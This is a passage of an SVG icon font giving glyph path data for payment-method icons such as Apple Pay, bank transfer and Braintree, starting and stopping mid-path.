22-30 22-25 0-50 0-75 0-2 0-4 0-5 0v-120h30v42c13 0 25 0 37 0 6 0 12-6 13-12 0-4 1-9 1-13 0-6 1-11 1-17h29c0 9 0 18 0 27-1 4-1 8-2 13-2 7-7 13-15 15 1 1 1 2 2 3 14 8 18 26 14 40z m-41-31c-13 0-26 0-39 0v28c13 0 27 0 41 0 6-1 11-8 11-15 0-8-4-12-13-13z m-78 170c0 9-6 20-18 24 1 0 2 1 4 1 15 8 18 26 14 40-3 14-17 21-29 22-26 0-51 0-76 0-2 0-3 0-5-1v-118h31v41c12 0 24 0 37 0 5-1 11-6 12-12 1-5 1-11 1-16 1-4 1-9 2-13h29c0 2 0 4 0 6-1 9-2 18-2 26z m-41 34c-13 0-26 0-39 0v27h24c5 0 9 0 13 1 9 0 15-7 15-14 1-8-4-14-13-14z m-85-41h-65v22h63v25h-63v20h65v26h-96v-118h96c0 9 0 17 0 25z m261-228h96v25h-67v23h64v23h-64v21h67v26h-97c1-40 1-79 1-118z m192 67c-6 2-12 4-19 5-8 1-16 0-24 1-5 1-10 1-12 7-2 7 2 12 10 12 17 0 33 0 50 0h5v25c0 1-1 1-1 1-22 0-45 1-67 0-10-1-19-6-24-16-4-7-4-15-4-23 1-18 8-27 24-30 11-2 23-3 34-4 7 0 12-3 12-8 1-5-4-10-9-11-4-1-7-2-11-2-13 0-26 0-39 0h-9v-25c1-1 1-1 2-1 23 0 45 0 68 1 11 1 20 8 26 18 5 10 5 21 3 32-2 8-6 15-15 18z m124-22c-2 16-11 23-27 26-10 1-20 1-30 2-3 0-5 1-8 2-4 1-6 4-5 9 0 5 4 8 10 8 17 0 33 0 50 0h5v26c-23 0-45 1-67 0-9 0-17-4-23-12-5-8-6-17-6-26 0-16 9-28 24-31 12-2 23-2 35-3 9-1 14-7 10-14-2-4-6-6-10-6-17 0-33-1-50-1h-5v-25c22 0 45-1 67 0 11 0 20 6 26 15 5 9 6 19 4 30z m-405 276h-31v-118h31v118z" />
<glyph glyph-name="apple-pay-alt" horiz-adv-x="1000" unicode="&#xecc2;" d="M847 696h-694c-84 0-153-69-153-154v-384c0-85 69-154 153-154h694c84 0 153 69 153 154v384c0 85-69 154-153 154z m-518-204c4-23-20-55-45-52-4 20 15 50 45 52z m30-201c-6-8-11-15-19-21-10-6-20-5-30-1-15 7-29 7-44 0-16-7-27-5-39 10-24 27-37 59-36 96 1 19 7 36 22 48 16 14 33 17 53 10 22-8 17-8 38 0 19 7 37 6 54-5 4-3 8-8 13-12-18-12-27-27-25-47 1-21 12-34 30-44-4-12-10-24-17-34z m190 121c-3-32-28-50-55-54-14-3-28-3-42 0v-83h-23c0 1 0 3 0 4 0 64 0 128 0 192 0 4 1 5 4 5 17 1 34 3 50 3 16 0 32-3 45-13 18-14 23-32 21-54z m98-137c-1 6-2 12-3 18-4-4-8-8-12-12-16-12-44-13-59-2-15 11-21 30-15 49 6 17 19 26 35 32 15 5 30 6 45 6 4 0 5 1 4 5 0 4 0 8-1 12-3 15-15 23-32 23-15 0-21-2-37-10-2 5-4 9-5 13 0 1 1 3 2 4 12 7 26 10 40 10 11 1 22 0 31-6 15-7 21-20 24-36 1-7 1-14 1-20l1-73c0-4 0-8 1-13-7 0-14 0-20 0z m150 114c-12-32-24-63-36-94-8-19-16-38-28-55-10-15-23-26-40-31-1 0-1-1-3-1-2 6-4 12-6 19 6 3 12 6 17 9 14 10 24 23 30 39 1 3 0 7-1 10-17 45-34 89-52 133 0 1 0 1 0 3h17c7 0 7 0 10-8 11-30 22-60 33-90 2-7 4-14 6-21 1 1 2 1 2 2 12 37 25 75 37 112 1 4 3 5 6 5 6-1 13 0 20 0-4-12-8-22-12-32z m-295 68c-9 4-19 5-28 5-7-1-13-2-19-2-3 0-3-1-3-4 0-25 0-51 0-77 0-2 0-3 3-3 10-2 21-3 31-1 19 2 39 14 40 41 2 19-7 35-24 41z m126-107c-13-1-25-2-36-10-16-10-18-35-3-46 6-5 12-5 19-5 17 1 33 15 34 31 1 10 0 20 0 30-5 0-9 0-14 0z" />
<glyph glyph-name="apple-pay" horiz-adv-x="1000" unicode="&#xecc3;" d="M250 380c-2 33 12 58 41 76-8 7-14 15-21 20-28 18-57 20-88 8-34-12-26-13-61 0-32 13-61 7-86-15-24-21-34-48-35-79-2-59 19-111 57-155 20-23 37-27 63-16 25 11 48 11 73 0 16-7 32-9 48 2 13 9 21 21 30 33 12 17 22 36 28 56-29 15-47 37-49 70z m296 157c-22 17-47 22-73 22-27 0-54-3-81-4-5-1-7-3-7-9 0-103 0-207 0-310 0-3 0-5 1-8h36v134c23-3 46-3 68 0 44 7 84 37 89 89 3 34-5 64-33 86z m-3-80c-3-44-34-63-65-67-17-2-34-2-51 1-4 1-5 3-5 6 0 42 0 83 0 125 0 4 1 6 5 6 10 1 20 2 30 3 16 0 32-2 47-7 27-11 41-36 39-67z m224-90c0 11 0 22-2 33-3 25-14 47-37 59-16 8-34 10-51 10-23-1-45-6-65-17-2-2-4-5-3-6 2-7 4-14 7-22 27 13 37 16 60 16 29 0 47-12 52-37 2-6 2-13 3-19 1-6-2-8-8-8-25 0-49-2-72-11-26-9-48-23-57-51-10-31 0-61 24-79 24-18 69-16 95 3 7 6 14 13 21 19 1-9 2-19 3-29h33c-1 8-2 14-2 21 0 39-1 79-1 118z m-37-66c-1-26-27-48-55-50-11 0-21 1-30 8-25 18-23 58 4 76 18 11 38 14 58 15 8 1 15 0 24 0 0-17 0-33-1-49z m238 163c-5 1-8-2-10-7-19-61-39-121-60-182 0-1-1-2-2-4-4 13-7 24-11 36-18 48-36 97-53 146-5 11-5 11-17 11h-27c0-2 0-3 1-4 28-72 56-143 83-215 2-5 3-12 2-17-10-25-26-47-49-62-8-6-17-11-27-16 4-10 7-20 10-30 2 1 3 1 4 1 29 9 49 27 66 51 20 27 32 57 44 88 20 51 39 102 59 152 6 17 12 34 19 52-11 0-22 0-32 0z m-746 116c-48-4-79-53-72-83 40-6 79 45 72 83z" />
<glyph glyph-name="bank-transfer-alt" horiz-adv-x="1000" unicode="&#xecc4;" d="M625 340c-4 0-8-1-11-3-4-2-5-5-5-8 0-3 1-6 4-8s5-3 9-3c2 0 5 1 8 2 2 1 5 2 6 4 3 1 4 4 4 6v8c-2 1-5 1-7 2-3 0-5 0-8 0z m-83 33c2 1 3 5 3 9 0 3-1 6-3 8s-4 4-7 4h-27v-24h26c3 0 5 1 8 3z m4-46c2 2 3 5 3 9 0 4-1 7-3 9s-4 4-8 4h-30v-25h29c4 0 7 1 9 3z m301 369h-694c-84 0-153-69-153-154v-384c0-85 69-154 153-154h694c84 0 153 69 153 154v384c0 85-69 154-153 154z m-162-310h24v-14c3 5 7 9 13 12 6 2 12 4 20 4 5 0 10-1 13-3s6-5 8-8c2-3 3-7 4-11s1-7 1-11v-54h-26v48c0 5-1 10-4 12s-4 4-8 4c-2 0-4-1-5-1-2-1-4-2-6-3-1-2-3-3-4-5-2-2-3-4-4-6v-49h-25v85z m-204 30h64c4 0 8-1 11-2 3-2 6-4 8-7 3-3 4-6 6-10 1-3 2-7 2-10 0-6-2-11-5-16-2-5-6-8-12-11 7-2 12-5 16-10s5-12 5-19c0-5-1-10-3-13s-5-7-8-10c-4-2-8-4-13-5s-9-2-15-2h-56v115z m-325 4c37 20 75 40 113 60 3 1 8 2 10 1 40-21 80-42 120-63 0 0 0-1 1-2h-251c3 2 5 3 7 4z m246-201h-251v21h251v-21z m0 26h-251v18h251v-18z m-234 22v125h34v-125h-34z m61 97v27h34v-124h-29c-6 0-5 4-5 8v89z m63-97v124h31v-124h-31z m60 0v124h31v-124h-31z m50 129h-253c0 2-1 4-1 6-1 7 2 9 9 9 33 0 65 0 97 0h148c0-6 0-10 0-15z m122-130h-17v-44h-10v44h-17v9h44v-9z m29-13c-3 0-6-1-8-2s-4-3-5-5v-24h-10v39h9v-8c1 3 3 5 5 7 2 1 4 2 7 2h1l1 0v-9z m41-31c-1 0-2 0-3 0s-1 0-2 0c-2 0-3 0-4 1s-2 2-2 3l0 3c-2-3-4-4-6-6s-6-1-8-1c-2 0-4 0-6 1-1 0-3 1-4 2s-2 3-3 4c0 2-1 3-1 5s1 3 2 5c0 2 2 3 3 4 1 1 3 2 5 3 2 0 4 1 7 1 2 0 3-1 5-1s3-1 4-1v2c0 3 0 5-2 6-1 1-3 2-6 2-2 0-4 0-6-1s-4-2-7-3l-3 6c5 3 11 5 17 5 5 0 10-1 13-4s4-7 4-12v-12c0-1 0-2 1-2s1-1 2-1v-9z m43 0h-10v22c0 3-1 6-2 7s-2 2-4 2c-1 0-2 0-3 0s-2-1-3-2c-1-1-2-2-3-3 0-1-1-2-1-3v-23h-10v39h9v-7c1 2 3 4 6 6s6 2 9 2c3 0 5-1 6-1s3-3 4-4c1-1 1-3 1-5s1-4 1-5v-25z m-6 81c-6-2-11-4-17-4-4 0-8 1-12 2-3 2-6 4-9 6-3 3-5 5-6 9-2 3-3 7-3 11 0 4 1 8 3 11s4 6 8 9 7 4 11 6 9 2 15 2c3 0 7 0 10-1 4-1 7-2 9-3v4c0 10-6 15-17 15-5 0-9-1-13-2-4-2-9-4-14-8l-7 17c5 3 11 6 17 8 6 2 13 3 20 3 13 0 22-3 29-9s11-15 11-27v-22c0-2 0-4 1-5s3-2 6-2v-22c-3 0-5-1-7-1s-4 0-6 0c-5 0-8 1-11 3s-4 4-4 8l-1 3c-4-4-8-8-13-11z m45-74c-1-2-2-3-3-4s-4-2-6-3c-2 0-4-1-6-1-2 0-3 1-5 1-2 0-3 0-5 1s-3 1-5 1c-1 1-3 2-4 3l4 6c5-3 10-4 15-4 2 0 3 0 5 1s1 2 1 3c0 1 0 2-2 3s-4 1-7 2c-2 1-5 1-6 2s-4 2-5 2c-1 1-2 2-2 3s-1 3-1 4c0 2 1 4 1 5 1 2 2 3 4 4s3 2 5 3c2 1 4 1 6 1 3 0 5 0 8-1 3-1 6-2 8-4l-4-6c-2 1-4 2-6 3-2 1-4 1-6 1-2 0-3 0-5-1s-1-2-1-3c0-2 0-3 1-3 1-1 3-2 6-2 3-1 6-2 8-2s3-2 4-3c2-1 3-2 3-3 1-1 1-3 1-4 0-2 0-4-1-5z m30 38c-1 1-2 1-3 1s-2 1-2 1c-4 0-6-2-6-7v-5h10v-8h-10v-27h-10v27h-5v8h5v4c0 5 2 9 4 12 2 3 5 4 9 4 4 0 7-1 10-2l-2-8z m44-27c0-1 0-1-1-1h-30c0-2 1-3 1-5s2-2 3-3c1 0 2-1 3-1s2-1 4-1c2 0 3 0 5 1 2 1 3 2 4 4l8-2c-1-3-3-6-7-8-3-2-6-3-11-3-3 0-6 1-8 2-3 1-5 3-7 4s-3 4-4 7c-1 2-1 5-1 7 0 3 0 6 1 8 1 3 2 5 4 7s4 3 7 4c2 1 5 2 8 2s6-1 9-2 4-3 6-4 3-4 4-7c1-2 2-5 2-7 0-1 0-1 0-2z m29 13c-3 0-6-1-8-2s-4-3-5-5v-24h-10v39h9v-8c1 3 3 5 5 7 2 1 4 2 7 2h1l1 0v-9z m63 48l-23 34-9-9v-25h-26v118h26v-68l29 35h28l-31-36 33-49h-27z m-269-60c-2 0-4-1-6-2-1-1-2-2-2-4 0-2 0-3 2-4s2-2 4-2c2 0 4 0 5 1s3 1 4 2c1 1 1 2 1 3v4c-1 1-2 1-4 2-1 0-2 0-4 0z m156 14c-1 0-2-1-4-1s-2-1-3-2c-1-1-1-2-2-3s-1-3-1-4h20c0 3-1 5-3 7-2 2-4 3-7 3z" />
<glyph glyph-name="bank-transfer" horiz-adv-x="1000" unicode="&#xecc5;" d="M350 441h-349c5 3 7 5 9 6 53 28 106 56 158 83 4 2 10 3 14 1 55-28 110-57 165-86 1-1 2-2 3-4z m2-211v-26h-348v26h348z m0-32v-30h-348v30h348z m-325 210h47v-173h-47v173z m132-174c-13 0-26 0-39 0-9 0-7 6-7 12 0 41 0 82 0 124v37h46v-173z m193 201v-22h-351c0 3 0 6-1 9-1 10 3 13 13 13 45 0 90 0 134 0h189c5 0 10 0 16 0z m-110-200h-43v172h43v-172z m83 0h-43v172h43v-172z m269 88c0-7-1-13-4-18-3-5-7-9-12-13s-11-6-17-7c-7-2-14-3-21-3h-78v160h89c5 0 10-1 15-4s8-5 11-9c4-4 6-8 8-13 1-5 2-10 2-15 0-8-2-15-5-22-4-6-10-11-18-15 10-3 17-7 22-14 5-7 8-16 8-27z m-95 87v-33h36c4 0 8 2 11 4 3 3 5 7 5 13 0 5-2 9-5 12s-6 4-10 4h-37z m57-80c0 5-1 10-4 13-3 3-6 5-11 5h-42v-35h41c5 0 9 2 12 5 3 3 4 7 4 12z m90-50c-5 0-11 1-16 3s-9 4-13 8c-3 3-6 7-8 12s-3 9-3 14c0 6 1 12 3 16s6 9 11 13c4 3 10 6 16 8 6 2 13 3 20 3 5 0 10-1 15-1 4-1 8-2 12-4v5c0 14-8 21-24 21-6 0-12-1-18-3s-12-6-19-10l-10 22c8 5 16 9 24 12 8 2 17 4 27 4 18 0 31-5 41-13 10-8 15-21 15-37v-30c0-4 0-6 2-8s3-2 7-2v-31c-3 0-7-1-10-1-3 0-5 0-7 0-7 0-12 1-16 4-3 2-5 6-6 11l-1 5c-5-7-11-12-19-16-7-3-15-5-23-5z m11 26c4 0 8 0 11 2 4 1 7 3 9 5 4 3 5 6 5 9v11c-3 1-6 2-10 3-3 0-7 1-10 1-7 0-12-2-16-5s-7-7-7-12c0-4 2-7 5-10 4-3 8-4 13-4z m202-24h-36v66c0 8-1 14-4 17-3 4-7 6-12 6-2 0-5-1-8-2-2-1-5-2-7-4s-5-4-6-7c-2-2-4-5-5-8v-68h-36v118h32v-20c5 7 11 13 19 17s17 5 27 5c8 0 14-1 19-4s8-6 11-11 4-9 5-14c1-5 1-10 1-15v-76z m103 0l-31 48-13-13v-35h-36v164h36v-95l40 49h39l-43-51 46-67h-38z m-440-48h-24v-61h-14v61h-23v12h61v-12z m39-19c-4 0-7-1-11-2s-5-4-7-7v-33h-14v54h13v-12c2 4 4 7 7 9s6 4 10 4c1 0 1 0 1 0 1 0 1 0 2-1v-12z m22-43c-2 0-5 0-7 1s-4 2-6 4c-2 1-3 3-4 5-1 2-1 4-1 7s0 5 1 7c1 2 3 4 5 6s4 2 7 3c3 1 6 1 10 1 2 0 4 0 7 0s4-1 6-2v3c0 4-1 6-3 8s-5 3-9 3c-3 0-6 0-9-1s-5-3-8-5l-4 9c7 5 14 7 22 7 8 0 14-2 18-6s7-9 7-16v-17c0-1 0-3 1-3s1-1 3-1v-12c-2 0-3 0-4 0-1-1-2-1-3-1-3 0-5 1-6 2s-2 3-3 5l0 3c-2-3-5-6-9-7-3-2-7-3-11-3z m4 10c2 0 5 0 7 1s3 2 5 3c1 2 2 3 2 4v7c-2 0-4 1-6 1-1 0-3 1-5 1-4 0-7-1-9-3s-3-3-3-6c0-2 1-4 2-6 2-1 4-2 7-2z m91-9h-14v30c0 5-1 8-2 10s-4 3-6 3c-2 0-3-1-5-1-1-1-2-1-4-2s-2-3-3-4c-1-1-2-3-2-4v-32h-14v54h12v-10c2 3 5 6 9 8s8 3 13 3c3 0 6-1 8-2 2-1 4-3 5-5 1-2 2-4 2-7s1-5 1-7v-34z m33-1c-2 0-4 0-7 0-2 1-4 1-7 2s-4 1-6 2c-2 1-4 2-6 3l6 9c7-4 13-6 20-6 3 0 5 0 7 1 1 1 2 3 2 5s-1 3-3 4c-2 1-5 2-10 3-3 1-6 2-9 3s-4 1-6 3c-1 1-2 2-3 4s-1 3-1 5c0 3 1 5 2 7s2 5 4 6c2 2 5 3 7 4 3 0 6 1 9 1 4 0 8-1 11-2s8-3 11-5l-6-8c-3 2-6 3-8 4-3 1-6 1-8 1-3 0-5 0-6-1-2-1-3-3-3-5 0-2 1-3 3-4s4-2 8-3c4-1 7-2 10-3s5-2 7-3c1-1 3-3 3-4s2-4 2-6c0-3-1-5-2-7s-3-4-4-5c-2-2-5-3-8-4-2-1-5-1-9-1z m34 1v37h-7v11h7v6c0 7 2 12 5 16s8 6 13 6c5 0 9-1 14-3l-3-10c-1 0-3 1-4 1s-3 1-4 1c-5 0-7-4-7-10v-7h13v-11h-13v-37h-14z m61-1c-4 0-8 1-12 2s-6 4-9 6-4 6-5 9-2 7-2 11c0 3 0 7 2 10s3 7 5 9c3 3 6 5 9 7s8 2 12 2 9-1 12-2 7-4 9-7c2-2 4-5 6-8s2-7 2-11c0-1 0-2-1-3 0 0 0-1 0-2h-42c1-2 1-4 2-5 1-2 2-3 3-5 1-1 3-2 5-2s3-1 5-1c2 0 5 1 7 2 3 1 5 3 5 5l12-3c-2-4-5-8-9-10-5-3-10-4-16-4z m14 32c0 5-2 8-4 10-3 3-6 4-10 4-2 0-4 0-5-1s-3-2-4-3c-2-1-3-2-3-4s-2-4-2-6h28z m55 11c-4 0-8-1-11-2s-6-4-7-7v-33h-14v54h13v-12c1 4 4 7 7 9s6 4 9 4c1 0 2 0 2 0 0 0 1 0 1-1v-12z" />
<glyph glyph-name="braintree-alt" horiz-adv-x="1000" unicode="&#xecc6;" d="M847 696v0h-694c-84 0-153-69-153-154v-384c0-85 69-154 153-154h694c84 0 153 69 153 154v384c0 85-69 154-153 154z m-424-302h13v-18h-13v18z m-182-67v0c0-1 0-1 0-1 0 0 0 0 0 0l0-1c-1-4-3-7-5-9-1-1-2-2-4-3 0-1 0-1-1-1l-1 0-1-1c0 0 0 0 0 0l-1 0c-1-1-1-1-2-1 0 0 0 0 0 0-1 0-1 0-1 0 0 0-1-1-1-1l-1 0 0 0-1 0c-1 0-1 0-1 0-1 0-1 0-2 0l0-1h0c-1 0-2 0-3 0l0 0h-41v11h9v55h-9v12h36c16 0 26-8 26-21 0 0 0-1 0-2 0 0 0-1 0-2l0 0 0-1 0 0c0 0-1 0-1-1 0 0 0 0 0 0l0-1 0-1 0 0c-1 0-1 0-1 0v-1c0 0 0 0 0 0l0-1s-1 0-1 0c0 0 0 0 0 0l0-1c0 0-1 0-1 0l0 0 0-1-1 0 0 0 0-1c-1 0-1 0-1 0l-1-1-1-1-1 0c-1-1-1-1-2-1 0 0 0 0 0-1h0v0h0c8-2 13-7 15-14v0c0 0 0-1 0-1 0-1 0-2 0-3v-1c0 0 0-1 0-1l0 0c0-1 0-1 0-1z m65 22c-1 4-4 7-9 7-10 0-20-8-20-22v-15h20v-11h-44v11h12v35h-9v11h21v-10c4 7 11 12 21 12 1 0 2 0 4 0 0 0 0 0 0-1 1 0 1 0 1 0l1 0 1 0 1 0 0-1 1 0 1 0 1-1 0 0 1-1 1 0c0 0 0 0 0-1 1 0 1 0 1 0 1-1 1-1 2-2 2-2 3-5 4-8l-12-3z m81-41h-21v6l0-1s-1 0-1 0l-1-1h0c0 0 0 0 0 0 0 0 0 0 0 0l-1-1 0 0 0 0 0 0c0 0 0 0-1 0l0-1 0 0-1 0 0 0h0l-1-1h0c-1 0-1 0-1 0s0 0-1 0c0 0 0 0 0 0l0-1c0 0-1 0-1 0l-1 0-1 0c0 0 0 0 0 0h0s0-1 0-1c0 0 0 0 0 0h-1s-1 0-1 0c0 0 0 0-1 0h0l0 0 0 0c0 0-1 0-1 0 0 0 0 0 0 0s-1 0-1 0c0 0 0 0 0 0v-1 1h0c-1-1-2-1-3-1h-1l-1 1 0 0h0l-1 0h-1c0 0 0 0 0 0h-1s0 0 0 0l-1 0h0c0 0 0 0 0 0 0 0-1 0-1 0l0 0-1 1 0 0c0 0 0 0-1 0l0 0c0 0 0 0 0 0s0 0 0 0h0c-1 0-1 0-1 0h0s0 0 0 0c0 0 0 0 0 1l-1 0h0s0 0 0 0l0 0c0 0 0 0-1 0 0 1-1 1-2 2l0 0c0 0 0 0-1 0h0c0 0 0 0 0 0s0 0 0 0l0 0s-1 0-1 0l0 1c0 0 0 0 0 0l-1 1c0 0 0 0 0 0l0 0c0 0-1 0-1 0 0 1 0 1 0 1l0 0 0 0c-1 1-1 1-1 1l0 0 0 0s0 0 0 0c0 0 0 0 0 0 0 1 0 1 0 1v0l-1 1c-1 2-2 5-2 8v1c0 0 0 1 1 1l0 1c0 0 0 1 0 1l0 0c0 0 0 1 0 1s0 0 0 1v0l1 1s0 0 0 1c0 0 0 0 0 0 0 0 0 0 0 1l1 0v0s0 0 0 0l0 0s0 1 0 1c0 0 0 0 0 0v0c0 0 0 0 1 0 0 0 0 0 0 0l0 0c0 0 0 1 0 1 0 0 0 0 0 0l0 0 1 1 0 0 0 0 1 0 0 0 0 1c0 0 0 0 0 0 0 0 1 0 1 0 0 1 0 1 0 1h0c1 0 1 0 1 0l1 1 0 0 0 0 0 0 0 0 1 0 0 1c0 0 0 0 0 0l1 0 1 0 0 0c0 0 0 0 0 1l1 0 1 0h0l1 0c0 0 0 0 0 0 0 0 0 1 0 1 0 0 0 0 1 0l0 0s0 0 0 0c1 0 1 0 1 0h0l1 0c0 0 0 1 1 1h0s0 0 1 0h0c0 0 0 0 0 0l1 0h0l1 0h0c1 0 3 0 5 0 1 0 2 0 3 0l1 0c0 0 1 0 1 0h0l1 0s1 0 1 0h1l1 0s0 0 0 0h0v0c0 0 0 0 0 0 1 0 1-1 1-1v0c0 0 0 0 0 0l1 0c0 0 0 0 0 0 0 0 0 0 0 0l1 0c0 0 0 0 0 0 1-1 2-1 2-1v3c0 1 0 1 0 2 0 0 0 1 0 1l0 1 0 0 0 1c-1 0-1 0-1 0 0 0 0 0 0 1 0 0 0 0 0 0l0 0 0 0h0l0 0c0 0 0 0 0 0 0 0 0 1 0 1s0 0 0 0h-1l0 0 0 0 0 0h0s0 0 0 0c0 0 0 0 0 0 0 1-1 1-1 1s0 0 0 0c0 0 0 0 0 0l0 0s0 0 0 0l-1 0 0 1 0 0-1 0h0s0 0 0 0l-1 1 0 0c0 0 0 0 0 0l0 0s-1 0-1 0h0s0 0 0 0c0 0 0 0 0 0h-1l-1 1 0 0s0 0 0 0l-1 0h0l0 0c0 0-1 0-1 0l0 0 0 0h-2l-1 0s0 0 0 0l0 0h-1s0 0-1 0c0 0 0 0-1 0l0 0c0 0-1-1-1-1h0l-1 0h0c0 0 0 0 0 0h0v0h-1c0 0 0 0 0 0h0c0 0 0 0-1 0 0 0 0 0 0 0l-1-1c0 0 0 0 0 0 0 0-1 0-1-1 0 0 0 0-1 0-1 0-2-1-3-2 0 0 0 0 0 0-1 0-1 0-1 0l0-1c-1 0-1 0-1-1h-1l-4 5h1l-4 4h0l0 0c0 0 1 0 1 0 2 2 4 3 6 5 0 0 1 0 1 0 0 1 1 1 1 1v0c0 0 0 0 0 0h0c0 0 1 0 1 0 1 1 2 1 4 2 1 0 1 0 2 0l2 1h1c0 0 1 0 2 0 1 0 2 0 3 0 2 0 4 0 5 0h0c1 0 1 0 1 0 0 0 0 0 1 0 1 0 3-1 4-2 0 0 0 0 0 0h1v0h0v0c0 0 0 0 0 0h0c1 0 1 0 1 0l0 0h1l1-1h0c0 0 1 0 1 0 1-1 1-1 1-1 0-1 0-1 1-1s0 0 0 0c0 0 0 0 0 0l2-2c0 0 1-1 2-2l0-1c1-1 1-1 1-2 1-3 2-6 2-10v-26h9v-11z m71 0h-57v11h23v35h-18v11h30v-46h22v-11z m84 0h-29v11h9v24c0 10-6 12-11 12-9 0-18-6-18-17v-19h9v-11h-30v11h9v35h-8v11h19v-7c4 5 11 9 20 9 13 0 22-8 22-21v-27h8v-11z m59 3c-1 0-1 0-2-1 0 0 0 0-1 0-1-1-2-1-3-2 0 0-1 0-1 0-1 0-1 0-2 0l-1-1-2 0-1 0c0 0 0 0-1 0 0 0 0 0 0-1h-3c-14 0-25 8-25 24v24h-15v11h15v21h11v-21h28v-11h-28v-24c0-9 7-13 14-13h2c0 0 0 0 0 1h0c1 0 1 0 1 0 0 0 0 0 1 0l0 0 1 0h0l1 0 0 1 0 0v0l0 0 1 0c0 0 0 0 1 0 0 0 0 0 0 0s1 0 1 1l0 0c0 0 1 0 1 0l1 1 0 0 1 0 1 1 0 0 1 1s1 1 1 1l1 1 0 0 3-3 1-1 4-4c-2-2-4-4-7-6z m71 38c-1 4-5 7-9 7-10 0-20-8-20-22v-15h20v-11h-45v11h13v35h-10v11h22v-10c3 7 11 12 21 12 0 0 1 0 2 0 0 0 0 0 0 0l1 0s1 0 1-1c1 0 1 0 1 0l1 0h0l2 0c0-1 0-1 1-1 0 0 0 0 0 0 0 0 1 0 1-1 0 0 0 0 1 0l0 0c4-3 7-7 8-12l-11-3z m80-17h-49c2-9 10-15 20-15 1 0 2 0 3 0 0 0 0 0 0 0h1c0 0 1 0 1 0h0s0 0 1 0c0 0 0 0 0 1l1 0h0s0 0 0 0 1 0 1 0c1 0 1 0 1 0l2 1s1 0 1 0c0 0 0 0 0 0 1 0 1 1 1 1l2 0c0 1 0 1 1 1l0 0 1 1 1 0c0 0 0 1 0 1 0 0 0 0 1 0l1 1 0 1 8-8c-6-7-16-11-28-11h-2s-1 0-1 0h-1l-1 0c0 0 0 0 0 0-1 1-1 1-2 1s0 0-1 0c0 0 0 0-1 0 0 0 0 0-1 0l0 0c-1 0-1 0-1 1-1 0-1 0-2 0l0 0-1 1c0 0 0 0 0 0l-1 0 0 0-1 1-1 0c0 0 0 0 0 0s0 0 0 0c0 1-1 1-1 1s0 0 0 0h0c0 0 0 0 0 0 0 0 0 0 0 0l-1 0s0 0 0 0c0 0 0 0 0 0l-1 1c0 0 0 0 0 0l0 0-1 0 0 1h0c0 0 0 0 0 0l0 0c0 0-1 0-1 0l0 0 0 0c0 1 0 1 0 1 0 0-1 0-1 0v0c0 0 0 0 0 0l0 1c0 0-1 0-1 0l0 1v0l-1 0c0 0 0 0 0 0h0c0 0 0 1 0 1v0c0 0 0 0-1 0l0 1-1 0 0 1c0 0 0 0 0 1l-1 0s0 0 0 0v1h0s0 0 0 0c0 0-1 0-1 0l0 0c0 1 0 1 0 2l-1 1 0 0s0 0 0 0c0 1 0 1 0 1 0 0 0 0 0 1-1 0-1 0-1 1 0 0 0 0 0 0l0 1 0 0 0 0c-1 1 0 1 0 2l0 0-1 1s0 1 0 2c0 0 0 0 0 0l0 1 0 1 0 1c0 3 0 5 1 8 0 0 0 0 0 0l1 2c0 3 2 6 4 8l0 0c1 2 2 3 3 4l0 0 0 0c0 0 1 0 1 1 1 1 2 1 3 2v1h0c0 0 0 0 0 0 0 0 0 0 0 0 1 0 1 1 1 1 1 0 1 0 1 0v0h1c1 1 2 1 4 2 0 0 1 0 1 0l0 0s1 1 1 1l0 0 1 0h0c0 0 1 0 1 0 2 0 4 1 7 1h0v0l0 0c0 0 1 0 1 0l0 0c1 0 1 0 1 0 1 0 1-1 1-1s1 0 1 0h1c0 0 0 0 0 0 0 0 0 0 1 0h0s0 0 0 0c0 0 1 0 1 0l0 0 1-1h1l1 0h0c1 0 1 0 1 0l1-1s0 0 0 0c0 0 0 0 1 0h0c0 0 0 0 0 0 0 0 1-1 1-1l1 0 0 0 1-1c0 0 0 0 0 0h0l1 0s0 0 0 0c0 0 0-1 0-1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 1 0l0 0 0 0 0 0c0 0 0-1 0-1s0 0 1 0c0 0 0 0 0 0 0 0 0 0 0 0l0 0s0 0 1-1l0 0v1c0 0 0-1 0-1l1 0 0-1 1-1 0 0c0 0 0 0 0 0l1-1 0 0 0 0 0 0c1-1 1-1 1-1l0 0 1-1s0 0 0 0l0-1s0 0 0 0c0 0 0 0 1 0l0-1v0c0 0 0 0 0 0l0-1v0l0 0s0-1 1-1l0 0 0 0s0-1 0-1c0 0 0 0 1-1l0 0 0-1s0-1 0-1c0 0 0 0 0 0l1-1s0-1 0-2l0-1 1-1c0-2 0-3 0-5v-4z m73 0h-49c2-9 10-15 20-15 1 0 2 0 3 0l2 0c1 1 1 1 2 1s0 0 1 0c0 0 0 0 0 0s1 0 1 0 0 0 1 1c0 0 0 0 0 0 0 0 1 0 1 0 0 0 1 0 2 1l0 0c1 1 3 1 4 2 0 0 1 1 1 1l0 0 1 0 0 1 1 1 8-8c-6-7-16-11-28-11h-3c0 0 0 0-1 0h0l-1 0s-1 0-1 1c-1 0-2 0-3 0l-1 0 0 0c-1 1-2 1-3 1l-1 1-3 1 0 0c0 0-1 0-1 1 0 0 0 0 0 0 0 0 0 0 0 0h-1l0 0s0 0 0 0c0 0 0 1-1 1 0 0 0 0 0 0h0c0 0-1 0-1 0 0 1-1 1-1 1v0h0c0 1-1 1-1 1l-1 1 0 0 0 0c0 0 0 0 0 1v0l0 0-1 0 0 0c0 0 0 1 0 1l-1 1-1 1s-1 2-2 3c-1 1-1 3-2 5 0 1 0 1 0 2 0 0 0 0-1 0v1l0 1v0c0 1 0 1 0 2 0 1 0 2 0 3l0 5v1c0 0 0 0 0 1l1 0v1l0 0c0 1 0 2 1 3 1 4 3 8 6 11l1 1c2 1 3 3 5 4 1 0 2 0 3 1s2 1 3 1l2 1c1 0 1 0 2 0 2 1 4 1 7 1h4l1 0h0c0 0 0 0 0 0v-1l1 0 0 0c0 0 1 0 1 0h0s1 0 1 0l1 0 1 0c0 0 0 0 0-1l1 0s0 0 0 0l0 0c0 0 0 0 0 0l1 0h0l1-1 0 0s0 0 0 0c0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0l0-1s0 0 0 0 0 0 0 0c1 0 1 0 1 0 0 0 0 0 0 0 0 0 0 0 0 0s0 0 0 0c0 0 1 0 1 0l0-1c0 0 0 0 0 0 1 0 1 0 1 0l0 0 0-1 1 0c1-1 1-1 1-1s1-1 1-1l1 0c5-6 9-15 9-24v-3z m-600 32c0 7-5 10-16 10h-13v-21h14c10 0 15 4 15 11z m-14-22h-15v-23h15c12 0 18 4 18 12 0 7-6 11-18 11z m126-18c0-5 5-7 11-7 9 